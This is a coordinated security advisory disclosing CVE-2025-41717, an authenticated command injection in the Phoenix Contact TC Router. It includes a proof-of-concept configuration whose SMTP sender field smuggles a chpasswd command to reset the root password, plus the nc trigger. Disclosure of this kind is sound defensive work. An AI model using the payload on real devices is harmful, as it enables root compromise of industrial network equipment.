Authenticated Command Injection in Phoenix Contact TC Router

The TC Router is affected by an authenticated command injection vulnerability. An attacker with valid credentials can exploit flaws in input handling to inject and execute arbitrary commands on the device. Successful exploitation allows code execution with root privileges, enabling full compromise of the system, manipulation of critical functions, and potential disruption of network operations.

Vendor description

“Connecting, distributing, and controlling power and data flows – we have been developing the right products for this purpose since 1923. Whether in industrial production facilities, in the field of renewable energies, in infrastructure, or for complex device connections: our solutions are used wherever processes must run automatically. Above and beyond their pure function, they help our partners to develop sustainable applications with more efficient processes and reduced costs.

We are Phoenix Contact: With innovative products and solutions, we are paving the way to a climate-neutral and sustainable world.”

Source: https://www.phoenixcontact.com/en-us/company

Vulnerable versions

Tested on TC Router version 1.06.18

According to the vendor, the following other products are also affected:

Vulnerability overview

1) Authenticated Code Execution (CVE-2025-41717)
The device is vulnerable to an authenticated code injection. An attacker with valid credentials could abuse this issue to execute code as root.

Proof of Concept

1) Authenticated Code Execution (CVE-2025-41717)

The config-upload endpoint can be used to inject arbitrary commands which get executed when polling the sock_server. The malicious config changes the root password and enables the service.

<entry name="conf/smtp/auth">1</entry>
<entry name="conf/smtp/from">p@t.com&apos;$(echo &quot;root:password1!&quot;|ch
passwd)&apos;</entry>
<entry name="conf/smtp/local">1</entry>
<entry name="conf/smtp/password">asdasdasd</entry>
<entry name="conf/smtp/port">25</entry>
<entry name="conf/smtp/server">192.168.19.138</entry>
[...]
<entry name="conf/alerts/sock_enable">1</entry>
<entry name="conf/alerts/sock_port">14323</entry>
<entry name="conf/alerts/sock_xml_io">0</entry>
<entry name="conf/alerts/sock_xml_nl">1</entry>

Connecting to the service and sending a mail triggers the command.

$ nc 192.168.19.133 14323
<?xml version="1.0"?>
<email to="pwned@pwned.com">
<subject>pwned</subject>
<body>
</body>
</email>

Solution

Install the latest available update. See vendor advisory for detailed version information.

Workaround

Restrict network access to the device.

Recommendation

Configuration file reviews are recommended before they got applied to the device.

Conducted in Collaboration

This research was conducted in cooperation with VERBUND OT Cyber Security Lab during a penetration test.

Contact Timeline

2025-07-17: Sent advisory to Phoenix Contact PSIRT.
2025-07-29: Vendor asked for a call to clarify the vulnerabilities.
2025-07-31: Aligned on timeline for September during call.
2025-08-19: Vendor confirmed publications for 2025-10-14. Confirmed the shift.
2025-09-25: Asked the vendor for another call to clarify details regarding all affected devices (including other advisories).
2025-09-26: Talked to vendor to clarify details.
2025-10-09: Asked for CVE Numbers. Received and included them in the advisory.
2025-11-18: Phone call with vendor. Agreed publication date after 2026-01-13.
2026-01-19: Coordinated release of security advisory.

Author(s)

Thomas Weber

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.

David Blagojevic

David Blagojevic is a Security Researcher at CyberDanube. He is currently engaged in offensive security engagements, doing pentests & research activities within the fields of firmware emulation & analysis, where he is contributing to the development and advancement of the MEDUSA Firmware Emulation Framework. He is currently a part-time masters student of computer science at TU Wien (Vienna University of Technology).

Felix Koroknai

Felix Koroknai is a Security Researcher at CyberDanube. Active in offensive security and firmware research, performing pentests across network (IT/OT) infrastructure, web stacks & embedded (I)IoT platforms/devices. Contributor to the MEDUSA Firmware Emulation Framework and currently a part-time student of computer science at TU Wien (Vienna University of Technology).